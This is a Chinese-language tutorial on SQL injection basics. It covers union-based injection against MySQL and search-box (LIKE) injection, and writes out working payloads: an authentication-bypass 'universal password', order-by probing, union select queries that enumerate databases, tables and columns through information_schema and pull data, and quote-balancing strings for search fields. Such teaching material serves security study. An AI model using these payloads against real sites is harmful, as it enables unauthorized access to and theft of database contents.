SQL注入1之基本原理 – 作者:iamYit

SQL注入基本原理

SQL注入基础原理

1）SQL注入概念及产生原因

当web应用向后台数据库传递SQL语句进行数据库操作时，如果对用户输入的参数没有经过严格的过滤处理，那么攻击者就可以构造特殊的SQL语句，直接输入数据库引擎执行，获取或修改数据库中的数据。

2）SQL注入的本质

把用户输入的数据当作代码来执行，违背了“数据与代码分离”的原则

3）SQL注入的两个关键点

1，用户能控制输入的内容；2，web应用把用户输入的内容带入到数据库执行；

SQL注入基础危害

）盗取网站的敏感信息、）绕过网站后台认证后台登录语句：SELECT * FROM admin WHERE Username=‘user’ and Password=‘pass’万能密码：‘or ’1‘ = ’1‘ #）借助SQL注入漏洞提权获取系统权限

）读取文件信息

MYSQL数据库注入-常用函数

（1）user()返回当前使用数据库的用户，也就是网站配置文件中连接数据库的账号（2）version()返回当前数据库的版本（3）database()返回当前使用的数据库，只有在use命令选择一个数据库之后，才能查到（4）group_concat()把数据库中的某列数据或某几列数据合并为一个字符串（5）@@datadir数据库路径（6）@@version_compile_os操作系统版本

SQL（联合）注入流程

?id=1 and 1=1

1、判断有无闭合and 1=1and 1=2 //结果和第一个一样说明需要闭合，反之无闭合有闭合则需要用到 –+闭合

2、猜解字段order by 10 //采用二分法3、判断数据回显位置-1 union select 1，2，3，4，5…. //参数等号后面加-表示不显示当前数据4、获取当前数据库名、用户、版本union select version(),database()，user()，4……4、获取全部数据库名

union select 1,2,(select group_concat(schema_name)from information_schema.schemata)

5、获取表名union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=’库名’

6、获取字段名union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name=’表名’

7、获取数据union select 1,2,(select group_concat(字段1，字段2)from 库名.表名

数据库结构

MySQL版本>5.0

mysql：保存有账户信息，权限信息，存储过程，event，时区等信息

sys：包含了一系列存储过程，自定义函数以及视图来帮助我们快速的了解系统的元数据信息。（元数据是关于数据的数据，如数据库或表名，列的数据类型，或访问权限等）

performance_schema：用于收集数据库服务器性能参数

information_schema：它提供了访问数据库元数据的方式，其中保存着关于MySQL服务器所维护的所有其他数据库的信息，如数据库名，数据库的表，表的数据类型与访问权限等。

函数名称：函数功能：

查库：select schema_name from information_schema.schema查表：select table_name from information_schema.tables where table_schema=库名查列：select column_name from information_schema.columns where table_name=表名查数据：select 列名 from 库名.表名

搜索型注入原理

一些网站为了方便用户查找网站的资源，都对用户提供了搜索功能，因为是搜索功能往往是程序员在编写代码时都忽略了对其变量（参数）的过滤，而且这样的漏洞在国内的系统中普遍的存在。其中又分为POST/GET，GET型的一般是用在网站上的搜索，而POST则是在用户名的登录，可以哦从form表单中的method=”get”属性来区分是get还是post，搜索型注入又称为文本框注入。

一般后台搜索组合的SQL语句如下：

$sql=”select * from user where password like ‘%pwd%’ order by password”;这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password，正常用户当然会输入例如admin，ckse等等。当时如果有人输入这样的内容呢？

‘and 1=1 and ‘%’ =’这样的话这句SQL语句就变成了这样：select * from urse where password like ‘%fendo’ and 1=1 and ‘%’ =’%’ order by password 存在SQL注入。

注入判断

1 搜索keywords’ ，如果出错的话，有90%的可能性存在漏洞；2 搜索keywords% ，如果同样出错的话，就有95%的可能性存在漏洞；3 搜索keywords% ‘and 1=1 and’ % ‘='(这个语句的功能就相当于普通SQL注入的and 1=1)看返回情况；4 搜索keywords% ‘and 1=2 and’ % ‘='(这个语句的功能就相当于普通SQL注入的and 1=2)看返回情况，根据两次的放回情况来判断是不是搜索型文本框注入了；

以下这几种语法都可以：‘and 1=1 and ‘%’=’%’ and 1=1–‘%’ and 1=1 and ‘%’=’